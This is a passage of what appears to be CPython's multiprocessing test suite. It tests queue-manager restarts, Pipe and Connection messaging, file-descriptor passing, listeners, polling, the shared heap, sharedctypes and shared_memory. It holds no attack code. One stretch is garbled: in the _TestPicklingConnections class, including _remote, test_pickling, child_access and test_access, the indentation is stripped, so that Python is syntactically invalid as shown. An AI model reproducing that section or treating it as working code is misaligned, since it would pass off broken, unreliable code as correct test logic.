    def test_rapid_restart(self):
        authkey = os.urandom(32)
        manager = QueueManager(
            address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER)
        try:
            srvr = manager.get_server()
            addr = srvr.address
            # Close the connection.Listener socket which gets opened as a part
            # of manager.get_server(). It's not needed for the test.
            srvr.listener.close()
            manager.start()
            p = self.Process(target=self._putter, args=(manager.address, authkey))
            p.start()
            p.join()
            queue = manager.get_queue()
            self.assertEqual(queue.get(), 'hello world')
            del queue
        finally:
            if hasattr(manager, "shutdown"):
                manager.shutdown()
        # Restart a manager on the exact same address.
        manager = QueueManager(
            address=addr, authkey=authkey, serializer=SERIALIZER)
        try:
            manager.start()
            self.addCleanup(manager.shutdown)
        except OSError as e:
            if e.errno != errno.EADDRINUSE:
                raise
            # Retry after some time, in case the old socket was lingering
            # (sporadic failure on buildbots)
            time.sleep(1.0)
            manager = QueueManager(
                address=addr, authkey=authkey, serializer=SERIALIZER)
            if hasattr(manager, "shutdown"):
                self.addCleanup(manager.shutdown)
#
#
#
# Empty-bytes marker: _TestConnection._echo() stops echoing on receipt.
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
    """Connection/Pipe semantics: send/recv, polling and fd passing."""
    ALLOWED_TYPES = ('processes', 'threads')

    @classmethod
    def _echo(cls, conn):
        # Echo bytes back until the SENTINEL (empty message) arrives.
        for msg in iter(conn.recv_bytes, SENTINEL):
            conn.send_bytes(msg)
        conn.close()

    def test_connection(self):
        conn, child_conn = self.Pipe()
        p = self.Process(target=self._echo, args=(child_conn,))
        p.daemon = True
        p.start()
        seq = [1, 2.25, None]
        msg = latin('hello world')
        longmsg = msg * 10
        arr = array.array('i', list(range(4)))
        if self.TYPE == 'processes':
            self.assertEqual(type(conn.fileno()), int)
        self.assertEqual(conn.send(seq), None)
        self.assertEqual(conn.recv(), seq)
        self.assertEqual(conn.send_bytes(msg), None)
        self.assertEqual(conn.recv_bytes(), msg)
        if self.TYPE == 'processes':
            # recv_bytes_into: full fill, offset fill, too-small buffer.
            buffer = array.array('i', [0]*10)
            expected = list(arr) + [0] * (10 - len(arr))
            self.assertEqual(conn.send_bytes(arr), None)
            self.assertEqual(conn.recv_bytes_into(buffer),
                             len(arr) * buffer.itemsize)
            self.assertEqual(list(buffer), expected)
            buffer = array.array('i', [0]*10)
            expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
            self.assertEqual(conn.send_bytes(arr), None)
            self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
                             len(arr) * buffer.itemsize)
            self.assertEqual(list(buffer), expected)
            buffer = bytearray(latin(' ' * 40))
            self.assertEqual(conn.send_bytes(longmsg), None)
            try:
                res = conn.recv_bytes_into(buffer)
            except multiprocessing.BufferTooShort as e:
                self.assertEqual(e.args, (longmsg,))
            else:
                self.fail('expected BufferTooShort, got %s' % res)
        poll = TimingWrapper(conn.poll)
        self.assertEqual(poll(), False)
        self.assertTimingAlmostEqual(poll.elapsed, 0)
        self.assertEqual(poll(-1), False)
        self.assertTimingAlmostEqual(poll.elapsed, 0)
        self.assertEqual(poll(TIMEOUT1), False)
        self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
        conn.send(None)
        time.sleep(.1)
        self.assertEqual(poll(TIMEOUT1), True)
        self.assertTimingAlmostEqual(poll.elapsed, 0)
        self.assertEqual(conn.recv(), None)
        really_big_msg = latin('X') * (1024 * 1024 * 16)  # 16Mb
        conn.send_bytes(really_big_msg)
        self.assertEqual(conn.recv_bytes(), really_big_msg)
        conn.send_bytes(SENTINEL)  # tell child to quit
        child_conn.close()
        if self.TYPE == 'processes':
            self.assertEqual(conn.readable, True)
            self.assertEqual(conn.writable, True)
            self.assertRaises(EOFError, conn.recv)
            self.assertRaises(EOFError, conn.recv_bytes)
        p.join()

    def test_duplex_false(self):
        reader, writer = self.Pipe(duplex=False)
        self.assertEqual(writer.send(1), None)
        self.assertEqual(reader.recv(), 1)
        if self.TYPE == 'processes':
            self.assertEqual(reader.readable, True)
            self.assertEqual(reader.writable, False)
            self.assertEqual(writer.readable, False)
            self.assertEqual(writer.writable, True)
            self.assertRaises(OSError, reader.send, 2)
            self.assertRaises(OSError, writer.recv)
            self.assertRaises(OSError, writer.poll)

    def test_spawn_close(self):
        # We test that a pipe connection can be closed by parent
        # process immediately after child is spawned.  On Windows this
        # would have sometimes failed on old versions because
        # child_conn would be closed before the child got a chance to
        # duplicate it.
        conn, child_conn = self.Pipe()
        p = self.Process(target=self._echo, args=(child_conn,))
        p.daemon = True
        p.start()
        child_conn.close()  # this might complete before child initializes
        msg = latin('hello')
        conn.send_bytes(msg)
        self.assertEqual(conn.recv_bytes(), msg)
        conn.send_bytes(SENTINEL)
        conn.close()
        p.join()

    def test_sendbytes(self):
        if self.TYPE != 'processes':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        msg = latin('abcdefghijklmnopqrstuvwxyz')
        a, b = self.Pipe()
        a.send_bytes(msg)
        self.assertEqual(b.recv_bytes(), msg)
        # offset / (offset, size) slicing of the payload
        a.send_bytes(msg, 5)
        self.assertEqual(b.recv_bytes(), msg[5:])
        a.send_bytes(msg, 7, 8)
        self.assertEqual(b.recv_bytes(), msg[7:7+8])
        a.send_bytes(msg, 26)
        self.assertEqual(b.recv_bytes(), latin(''))
        a.send_bytes(msg, 26, 0)
        self.assertEqual(b.recv_bytes(), latin(''))
        # out-of-range offset/size combinations must be rejected
        self.assertRaises(ValueError, a.send_bytes, msg, 27)
        self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
        self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
        self.assertRaises(ValueError, a.send_bytes, msg, -1)
        self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)

    @classmethod
    def _is_fd_assigned(cls, fd):
        # Return True if *fd* refers to an open file descriptor.
        try:
            os.fstat(fd)
        except OSError as e:
            if e.errno == errno.EBADF:
                return False
            raise
        else:
            return True

    @classmethod
    def _writefd(cls, conn, data, create_dummy_fds=False):
        if create_dummy_fds:
            # Occupy all low fds so the transferred fd lands above 255.
            for i in range(0, 256):
                if not cls._is_fd_assigned(i):
                    os.dup2(conn.fileno(), i)
        fd = reduction.recv_handle(conn)
        if msvcrt:
            fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
        os.write(fd, data)
        os.close(fd)

    @unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
    def test_fd_transfer(self):
        if self.TYPE != 'processes':
            self.skipTest("only makes sense with processes")
        conn, child_conn = self.Pipe(duplex=True)
        p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
        p.daemon = True
        p.start()
        self.addCleanup(test.support.unlink, test.support.TESTFN)
        with open(test.support.TESTFN, "wb") as f:
            fd = f.fileno()
            if msvcrt:
                fd = msvcrt.get_osfhandle(fd)
            reduction.send_handle(conn, fd, p.pid)
        p.join()
        with open(test.support.TESTFN, "rb") as f:
            self.assertEqual(f.read(), b"foo")

    @unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
    @unittest.skipIf(sys.platform == "win32",
                     "test semantics don't make sense on Windows")
    @unittest.skipIf(MAXFD <= 256,
                     "largest assignable fd number is too small")
    @unittest.skipUnless(hasattr(os, "dup2"),
                         "test needs os.dup2()")
    def test_large_fd_transfer(self):
        # With fd > 256 (issue #11657)
        if self.TYPE != 'processes':
            self.skipTest("only makes sense with processes")
        conn, child_conn = self.Pipe(duplex=True)
        p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
        p.daemon = True
        p.start()
        self.addCleanup(test.support.unlink, test.support.TESTFN)
        with open(test.support.TESTFN, "wb") as f:
            fd = f.fileno()
            for newfd in range(256, MAXFD):
                if not self._is_fd_assigned(newfd):
                    break
            else:
                self.fail("could not find an unassigned large file descriptor")
            os.dup2(fd, newfd)
            try:
                reduction.send_handle(conn, newfd, p.pid)
            finally:
                os.close(newfd)
        p.join()
        with open(test.support.TESTFN, "rb") as f:
            self.assertEqual(f.read(), b"bar")

    @classmethod
    def _send_data_without_fd(self, conn):
        # Write raw data with no ancillary fd attached.
        os.write(conn.fileno(), b"\0")

    @unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
    @unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
    def test_missing_fd_transfer(self):
        # Check that exception is raised when received data is not
        # accompanied by a file descriptor in ancillary data.
        if self.TYPE != 'processes':
            self.skipTest("only makes sense with processes")
        conn, child_conn = self.Pipe(duplex=True)
        p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
        p.daemon = True
        p.start()
        self.assertRaises(RuntimeError, reduction.recv_handle, conn)
        p.join()

    def test_context(self):
        a, b = self.Pipe()
        with a, b:
            a.send(1729)
            self.assertEqual(b.recv(), 1729)
            if self.TYPE == 'processes':
                self.assertFalse(a.closed)
                self.assertFalse(b.closed)
        if self.TYPE == 'processes':
            self.assertTrue(a.closed)
            self.assertTrue(b.closed)
            self.assertRaises(OSError, a.recv)
            self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
    """Listener binding and context-manager behaviour."""
    ALLOWED_TYPES = ('processes',)

    def test_multiple_bind(self):
        # Binding a second listener to an in-use address must fail.
        for family in self.connection.families:
            l = self.connection.Listener(family=family)
            self.addCleanup(l.close)
            self.assertRaises(OSError, self.connection.Listener,
                              l.address, family)

    def test_context(self):
        with self.connection.Listener() as l:
            with self.connection.Client(l.address) as c:
                with l.accept() as d:
                    c.send(1729)
                    self.assertEqual(d.recv(), 1729)
        if self.TYPE == 'processes':
            # The listener is closed once the with-block exits.
            self.assertRaises(OSError, l.accept)

    @unittest.skipUnless(util.abstract_sockets_supported,
                         "test needs abstract socket support")
    def test_abstract_socket(self):
        with self.connection.Listener("\0something") as listener:
            with self.connection.Client(listener.address) as client:
                with listener.accept() as d:
                    client.send(1729)
                    self.assertEqual(d.recv(), 1729)
        if self.TYPE == 'processes':
            self.assertRaises(OSError, listener.accept)
class _TestListenerClient(BaseTestCase):
    """Listener/Client round trips, plus historical regression tests."""
    ALLOWED_TYPES = ('processes', 'threads')

    @classmethod
    def _test(cls, address):
        # Child side: connect, send one greeting, close.
        conn = cls.connection.Client(address)
        conn.send('hello')
        conn.close()

    def test_listener_client(self):
        for family in self.connection.families:
            l = self.connection.Listener(family=family)
            p = self.Process(target=self._test, args=(l.address,))
            p.daemon = True
            p.start()
            conn = l.accept()
            self.assertEqual(conn.recv(), 'hello')
            p.join()
            l.close()

    def test_issue14725(self):
        l = self.connection.Listener()
        p = self.Process(target=self._test, args=(l.address,))
        p.daemon = True
        p.start()
        time.sleep(1)
        # On Windows the client process should by now have connected,
        # written data and closed the pipe handle by now.  This causes
        # ConnectNamdedPipe() to fail with ERROR_NO_DATA.  See Issue
        # 14725.
        conn = l.accept()
        self.assertEqual(conn.recv(), 'hello')
        conn.close()
        p.join()
        l.close()

    def test_issue16955(self):
        # Data sent before the first poll() must still be seen.
        for fam in self.connection.families:
            l = self.connection.Listener(family=fam)
            c = self.connection.Client(l.address)
            a = l.accept()
            a.send_bytes(b"hello")
            self.assertTrue(c.poll(1))
            a.close()
            c.close()
            l.close()
class _TestPoll(BaseTestCase):
    """Connection.poll() semantics and message-boundary guarantees."""
    ALLOWED_TYPES = ('processes', 'threads')

    def test_empty_string(self):
        # Even an empty message makes poll() return True.
        a, b = self.Pipe()
        self.assertEqual(a.poll(), False)
        b.send_bytes(b'')
        self.assertEqual(a.poll(), True)
        self.assertEqual(a.poll(), True)

    @classmethod
    def _child_strings(cls, conn, strings):
        for s in strings:
            time.sleep(0.1)
            conn.send_bytes(s)
        conn.close()

    def test_strings(self):
        strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
        a, b = self.Pipe()
        p = self.Process(target=self._child_strings, args=(b, strings))
        p.start()
        for s in strings:
            # Poll (up to ~2s) until the next message is available.
            for i in range(200):
                if a.poll(0.01):
                    break
            x = a.recv_bytes()
            self.assertEqual(s, x)
        p.join()

    @classmethod
    def _child_boundaries(cls, r):
        # Polling may "pull" a message in to the child process, but we
        # don't want it to pull only part of a message, as that would
        # corrupt the pipe for any other processes which might later
        # read from it.
        r.poll(5)

    def test_boundaries(self):
        r, w = self.Pipe(False)
        p = self.Process(target=self._child_boundaries, args=(r,))
        p.start()
        time.sleep(2)
        L = [b"first", b"second"]
        for obj in L:
            w.send_bytes(obj)
        w.close()
        p.join()
        self.assertIn(r.recv_bytes(), L)

    @classmethod
    def _child_dont_merge(cls, b):
        b.send_bytes(b'a')
        b.send_bytes(b'b')
        b.send_bytes(b'cd')

    def test_dont_merge(self):
        # Consecutive messages must not be coalesced by polling.
        a, b = self.Pipe()
        self.assertEqual(a.poll(0.0), False)
        self.assertEqual(a.poll(0.1), False)
        p = self.Process(target=self._child_dont_merge, args=(b,))
        p.start()
        self.assertEqual(a.recv_bytes(), b'a')
        self.assertEqual(a.poll(1.0), True)
        self.assertEqual(a.poll(1.0), True)
        self.assertEqual(a.recv_bytes(), b'b')
        self.assertEqual(a.poll(1.0), True)
        self.assertEqual(a.poll(1.0), True)
        self.assertEqual(a.poll(0.0), True)
        self.assertEqual(a.recv_bytes(), b'cd')
        p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
    # Stop the resource sharer so its background thread/socket does not
    # linger into later test classes.
    from multiprocessing import resource_sharer
    resource_sharer.stop(timeout=support.LONG_TIMEOUT)
@classmethod
def _listener(cls, conn, families):
    # For each family: publish a listening address, accept one client
    # connection and send that connection object (pickled) to the parent.
    for fam in families:
        l = cls.connection.Listener(family=fam)
        conn.send(l.address)
        new_conn = l.accept()
        conn.send(new_conn)
        new_conn.close()
        l.close()
    # Same dance once more with a plain TCP socket.
    l = socket.create_server((test.support.HOST, 0))
    conn.send(l.getsockname())
    new_conn, addr = l.accept()
    conn.send(new_conn)
    new_conn.close()
    l.close()
    # Block until the parent signals completion (it sends None at the end).
    conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
    """White-box tests of multiprocessing.heap's arena allocator."""

    ALLOWED_TYPES = ('processes',)

    def setUp(self):
        super().setUp()
        # Make pristine heap for these tests
        self.old_heap = multiprocessing.heap.BufferWrapper._heap
        multiprocessing.heap.BufferWrapper._heap = multiprocessing.heap.Heap()

    def tearDown(self):
        multiprocessing.heap.BufferWrapper._heap = self.old_heap
        super().tearDown()

    def test_heap(self):
        """Allocate/free many random-sized blocks, then verify the heap's
        internal free/occupied bookkeeping is exhaustive and contiguous."""
        iterations = 5000
        maxblocks = 50
        blocks = []

        # get the heap object
        heap = multiprocessing.heap.BufferWrapper._heap
        # force arenas to be freed eagerly so the final counters reach zero
        heap._DISCARD_FREE_SPACE_LARGER_THAN = 0

        # create and destroy lots of blocks of different sizes
        for i in range(iterations):
            size = int(random.lognormvariate(0, 1) * 1000)
            b = multiprocessing.heap.BufferWrapper(size)
            blocks.append(b)
            if len(blocks) > maxblocks:
                i = random.randrange(maxblocks)
                del blocks[i]
            del b

        # verify the state of the heap
        with heap._lock:
            all = []
            free = 0
            occupied = 0
            for L in list(heap._len_to_seq.values()):
                # count all free blocks in arenas
                for arena, start, stop in L:
                    all.append((heap._arenas.index(arena), start, stop,
                                stop-start, 'free'))
                    free += (stop-start)
            for arena, arena_blocks in heap._allocated_blocks.items():
                # count all allocated blocks in arenas
                for start, stop in arena_blocks:
                    all.append((heap._arenas.index(arena), start, stop,
                                stop-start, 'occupied'))
                    occupied += (stop-start)

            # every byte of every arena is either free or occupied
            self.assertEqual(free + occupied,
                             sum(arena.size for arena in heap._arenas))

            all.sort()

            # consecutive blocks must tile each arena with no gaps/overlap
            for i in range(len(all)-1):
                (arena, start, stop) = all[i][:3]
                (narena, nstart, nstop) = all[i+1][:3]
                if arena != narena:
                    # Two different arenas
                    self.assertEqual(stop, heap._arenas[arena].size)  # last block
                    self.assertEqual(nstart, 0)  # first block
                else:
                    # Same arena: two adjacent blocks
                    self.assertEqual(stop, nstart)

        # test free'ing all blocks
        random.shuffle(blocks)
        while blocks:
            blocks.pop()

        self.assertEqual(heap._n_frees, heap._n_mallocs)
        self.assertEqual(len(heap._pending_free_blocks), 0)
        self.assertEqual(len(heap._arenas), 0)
        self.assertEqual(len(heap._allocated_blocks), 0, heap._allocated_blocks)
        self.assertEqual(len(heap._len_to_seq), 0)

    def test_free_from_gc(self):
        # Check that freeing of blocks by the garbage collector doesn't deadlock
        # (issue #12352).
        # Make sure the GC is enabled, and set lower collection thresholds to
        # make collections more frequent (and increase the probability of
        # deadlock).
        if not gc.isenabled():
            gc.enable()
            self.addCleanup(gc.disable)
        thresholds = gc.get_threshold()
        self.addCleanup(gc.set_threshold, *thresholds)
        gc.set_threshold(10)

        # perform numerous block allocations, with cyclic references to make
        # sure objects are collected asynchronously by the gc
        for i in range(5000):
            a = multiprocessing.heap.BufferWrapper(1)
            b = multiprocessing.heap.BufferWrapper(1)
            # circular references
            a.buddy = b
            b.buddy = a
#
#
#
class _Foo(Structure):
    # Simple ctypes structure used by the sharedctypes tests below.
    # Note: the tests only ever double/check x and y; z is just extra
    # payload that exercises a 64-bit field.
    _fields_ = [
        ('x', c_int),
        ('y', c_double),
        ('z', c_longlong,)
    ]
class _TestSharedCTypes(BaseTestCase):
    """Tests for multiprocessing.sharedctypes Value/Array sharing."""

    ALLOWED_TYPES = ('processes',)

    def setUp(self):
        if not HAS_SHAREDCTYPES:
            self.skipTest("requires multiprocessing.sharedctypes")

    @classmethod
    def _double(cls, x, y, z, foo, arr, string):
        """Child: double every shared value in place."""
        x.value *= 2
        y.value *= 2
        z.value *= 2
        foo.x *= 2
        foo.y *= 2
        string.value *= 2
        for i in range(len(arr)):
            arr[i] *= 2

    def test_sharedctypes(self, lock=False):
        """Mutations made by a child are visible to the parent through
        shared ctypes objects (with or without a synchronizing lock)."""
        x = Value('i', 7, lock=lock)
        y = Value(c_double, 1.0/3.0, lock=lock)
        z = Value(c_longlong, 2 ** 33, lock=lock)
        foo = Value(_Foo, 3, 2, lock=lock)
        arr = self.Array('d', list(range(10)), lock=lock)
        string = self.Array('c', 20, lock=lock)
        string.value = latin('hello')

        p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
        p.daemon = True
        p.start()
        p.join()

        self.assertEqual(x.value, 14)
        self.assertAlmostEqual(y.value, 2.0/3.0)
        self.assertEqual(z.value, 2 ** 34)
        self.assertEqual(foo.x, 6)
        self.assertAlmostEqual(foo.y, 4.0)
        for i in range(10):
            self.assertAlmostEqual(arr[i], i*2)
        self.assertEqual(string.value, latin('hellohello'))

    def test_synchronize(self):
        # Same as test_sharedctypes but with lock-wrapped objects.
        self.test_sharedctypes(lock=True)

    def test_copy(self):
        """copy() must snapshot a ctypes structure, detached from the
        original."""
        foo = _Foo(2, 5.0, 2 ** 33)
        bar = copy(foo)
        foo.x = 0
        foo.y = 0
        foo.z = 0
        self.assertEqual(bar.x, 2)
        self.assertAlmostEqual(bar.y, 5.0)
        self.assertEqual(bar.z, 2 ** 33)
@unittest.skipUnless(HAS_SHMEM, "requires multiprocessing.shared_memory")
class _TestSharedMemory(BaseTestCase):
    """Tests for multiprocessing.shared_memory: SharedMemory blocks,
    ShareableList, and SharedMemoryManager."""

    ALLOWED_TYPES = ('processes',)

    @staticmethod
    def _attach_existing_shmem_then_write(shmem_name_or_obj, binary_data):
        """Child: attach to a segment (by name, or via a pickled
        SharedMemory object) and write *binary_data* at its start."""
        if isinstance(shmem_name_or_obj, str):
            local_sms = shared_memory.SharedMemory(shmem_name_or_obj)
        else:
            local_sms = shmem_name_or_obj
        local_sms.buf[:len(binary_data)] = binary_data
        local_sms.close()

    def test_shared_memory_basics(self):
        """Create/attach/unlink semantics of a single SharedMemory block."""
        sms = shared_memory.SharedMemory('test01_tsmb', create=True, size=512)
        self.addCleanup(sms.unlink)

        # Verify attributes are readable.
        self.assertEqual(sms.name, 'test01_tsmb')
        self.assertGreaterEqual(sms.size, 512)
        self.assertGreaterEqual(len(sms.buf), sms.size)

        # Modify contents of shared memory segment through memoryview.
        sms.buf[0] = 42
        self.assertEqual(sms.buf[0], 42)

        # Attach to existing shared memory segment.
        also_sms = shared_memory.SharedMemory('test01_tsmb')
        self.assertEqual(also_sms.buf[0], 42)
        also_sms.close()

        # Attach to existing shared memory segment but specify a new size.
        same_sms = shared_memory.SharedMemory('test01_tsmb', size=20*sms.size)
        self.assertLess(same_sms.size, 20*sms.size)  # Size was ignored.
        same_sms.close()

        # Creating Shared Memory Segment with -ve size
        with self.assertRaises(ValueError):
            shared_memory.SharedMemory(create=True, size=-2)

        # Attaching Shared Memory Segment without a name
        with self.assertRaises(ValueError):
            shared_memory.SharedMemory(create=False)

        # Test if shared memory segment is created properly,
        # when _make_filename returns an existing shared memory segment name
        with unittest.mock.patch(
            'multiprocessing.shared_memory._make_filename') as mock_make_filename:

            NAME_PREFIX = shared_memory._SHM_NAME_PREFIX
            names = ['test01_fn', 'test02_fn']
            # Prepend NAME_PREFIX which can be '/psm_' or 'wnsm_', necessary
            # because some POSIX compliant systems require name to start with /
            names = [NAME_PREFIX + name for name in names]

            mock_make_filename.side_effect = names
            shm1 = shared_memory.SharedMemory(create=True, size=1)
            self.addCleanup(shm1.unlink)
            self.assertEqual(shm1._name, names[0])

            mock_make_filename.side_effect = names
            shm2 = shared_memory.SharedMemory(create=True, size=1)
            self.addCleanup(shm2.unlink)
            self.assertEqual(shm2._name, names[1])

        if shared_memory._USE_POSIX:
            # Posix Shared Memory can only be unlinked once.  Here we
            # test an implementation detail that is not observed across
            # all supported platforms (since WindowsNamedSharedMemory
            # manages unlinking on its own and unlink() does nothing).
            # True release of shared memory segment does not necessarily
            # happen until process exits, depending on the OS platform.
            with self.assertRaises(FileNotFoundError):
                sms_uno = shared_memory.SharedMemory(
                    'test01_dblunlink',
                    create=True,
                    size=5000
                )

                try:
                    self.assertGreaterEqual(sms_uno.size, 5000)

                    sms_duo = shared_memory.SharedMemory('test01_dblunlink')
                    sms_duo.unlink()  # First shm_unlink() call.
                    sms_duo.close()
                    sms_uno.close()

                finally:
                    sms_uno.unlink()  # A second shm_unlink() call is bad.

        with self.assertRaises(FileExistsError):
            # Attempting to create a new shared memory segment with a
            # name that is already in use triggers an exception.
            there_can_only_be_one_sms = shared_memory.SharedMemory(
                'test01_tsmb',
                create=True,
                size=512
            )

        if shared_memory._USE_POSIX:
            # Requesting creation of a shared memory segment with the option
            # to attach to an existing segment, if that name is currently in
            # use, should not trigger an exception.
            # Note:  Using a smaller size could possibly cause truncation of
            # the existing segment but is OS platform dependent.  In the
            # case of MacOS/darwin, requesting a smaller size is disallowed.
            class OptionalAttachSharedMemory(shared_memory.SharedMemory):
                _flags = os.O_CREAT | os.O_RDWR
            ok_if_exists_sms = OptionalAttachSharedMemory('test01_tsmb')
            self.assertEqual(ok_if_exists_sms.size, sms.size)
            ok_if_exists_sms.close()

        # Attempting to attach to an existing shared memory segment when
        # no segment exists with the supplied name triggers an exception.
        with self.assertRaises(FileNotFoundError):
            nonexisting_sms = shared_memory.SharedMemory('test01_notthere')
            nonexisting_sms.unlink()  # Error should occur on prior line.

        sms.close()

    def test_shared_memory_across_processes(self):
        """A child can attach by name, or via a pickled SharedMemory
        object, and its writes are visible to the parent."""
        sms = shared_memory.SharedMemory('test02_tsmap', True, size=512)
        self.addCleanup(sms.unlink)

        # Verify remote attachment to existing block by name is working.
        p = self.Process(
            target=self._attach_existing_shmem_then_write,
            args=(sms.name, b'howdy')
        )
        p.daemon = True
        p.start()
        p.join()
        self.assertEqual(bytes(sms.buf[:5]), b'howdy')

        # Verify pickling of SharedMemory instance also works.
        p = self.Process(
            target=self._attach_existing_shmem_then_write,
            args=(sms, b'HELLO')
        )
        p.daemon = True
        p.start()
        p.join()
        self.assertEqual(bytes(sms.buf[:5]), b'HELLO')

        sms.close()

    @unittest.skipIf(os.name != "posix", "not feasible in non-posix platforms")
    def test_shared_memory_SharedMemoryServer_ignores_sigint(self):
        # bpo-36368: protect SharedMemoryManager server process from
        # KeyboardInterrupt signals.
        smm = multiprocessing.managers.SharedMemoryManager()
        smm.start()

        # make sure the manager works properly at the beginning
        sl = smm.ShareableList(range(10))

        # the manager's server should ignore KeyboardInterrupt signals, and
        # maintain its connection with the current process, and success when
        # asked to deliver memory segments.
        os.kill(smm._process.pid, signal.SIGINT)

        sl2 = smm.ShareableList(range(10))

        # test that the custom signal handler registered in the Manager does
        # not affect signal handling in the parent process.
        with self.assertRaises(KeyboardInterrupt):
            os.kill(os.getpid(), signal.SIGINT)

        smm.shutdown()

    @unittest.skipIf(os.name != "posix", "resource_tracker is posix only")
    def test_shared_memory_SharedMemoryManager_reuses_resource_tracker(self):
        # bpo-36867: test that a SharedMemoryManager uses the
        # same resource_tracker process as its parent.
        cmd = '''if 1:
            from multiprocessing.managers import SharedMemoryManager


            smm = SharedMemoryManager()
            smm.start()
            sl = smm.ShareableList(range(10))
            smm.shutdown()
        '''
        rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)

        # Before bpo-36867 was fixed, a SharedMemoryManager not using the same
        # resource_tracker process as its parent would make the parent's
        # tracker complain about sl being leaked even though smm.shutdown()
        # properly released sl.
        self.assertFalse(err)

    def test_shared_memory_SharedMemoryManager_basics(self):
        """Lifecycle of manager-owned SharedMemory/ShareableList objects."""
        smm1 = multiprocessing.managers.SharedMemoryManager()
        with self.assertRaises(ValueError):
            smm1.SharedMemory(size=9)  # Fails if SharedMemoryServer not started
        smm1.start()
        lol = [ smm1.ShareableList(range(i)) for i in range(5, 10) ]
        lom = [ smm1.SharedMemory(size=j) for j in range(32, 128, 16) ]
        doppleganger_list0 = shared_memory.ShareableList(name=lol[0].shm.name)
        self.assertEqual(len(doppleganger_list0), 5)
        doppleganger_shm0 = shared_memory.SharedMemory(name=lom[0].name)
        self.assertGreaterEqual(len(doppleganger_shm0.buf), 32)
        held_name = lom[0].name
        smm1.shutdown()
        if sys.platform != "win32":
            # Calls to unlink() have no effect on Windows platform; shared
            # memory will only be released once final process exits.
            with self.assertRaises(FileNotFoundError):
                # No longer there to be attached to again.
                absent_shm = shared_memory.SharedMemory(name=held_name)

        with multiprocessing.managers.SharedMemoryManager() as smm2:
            sl = smm2.ShareableList("howdy")
            shm = smm2.SharedMemory(size=128)
            held_name = sl.shm.name
        if sys.platform != "win32":
            with self.assertRaises(FileNotFoundError):
                # No longer there to be attached to again.
                absent_sl = shared_memory.ShareableList(name=held_name)

    def test_shared_memory_ShareableList_basics(self):
        """Element access, mutation, format changes and duplication of a
        ShareableList."""
        sl = shared_memory.ShareableList(
            ['howdy', b'HoWdY', -273.154, 100, None, True, 42]
        )
        self.addCleanup(sl.shm.unlink)

        # Verify attributes are readable.
        self.assertEqual(sl.format, '8s8sdqxxxxxx?xxxxxxxx?q')

        # Exercise len().
        self.assertEqual(len(sl), 7)

        # Exercise index().
        with warnings.catch_warnings():
            # Suppress BytesWarning when comparing against b'HoWdY'.
            warnings.simplefilter('ignore')
            with self.assertRaises(ValueError):
                sl.index('100')
            self.assertEqual(sl.index(100), 3)

        # Exercise retrieving individual values.
        self.assertEqual(sl[0], 'howdy')
        self.assertEqual(sl[-2], True)

        # Exercise iterability.
        self.assertEqual(
            tuple(sl),
            ('howdy', b'HoWdY', -273.154, 100, None, True, 42)
        )

        # Exercise modifying individual values.
        sl[3] = 42
        self.assertEqual(sl[3], 42)
        sl[4] = 'some'  # Change type at a given position.
        self.assertEqual(sl[4], 'some')
        self.assertEqual(sl.format, '8s8sdq8sxxxxxxx?q')
        with self.assertRaisesRegex(ValueError,
                                    "exceeds available storage"):
            sl[4] = 'far too many'
        self.assertEqual(sl[4], 'some')
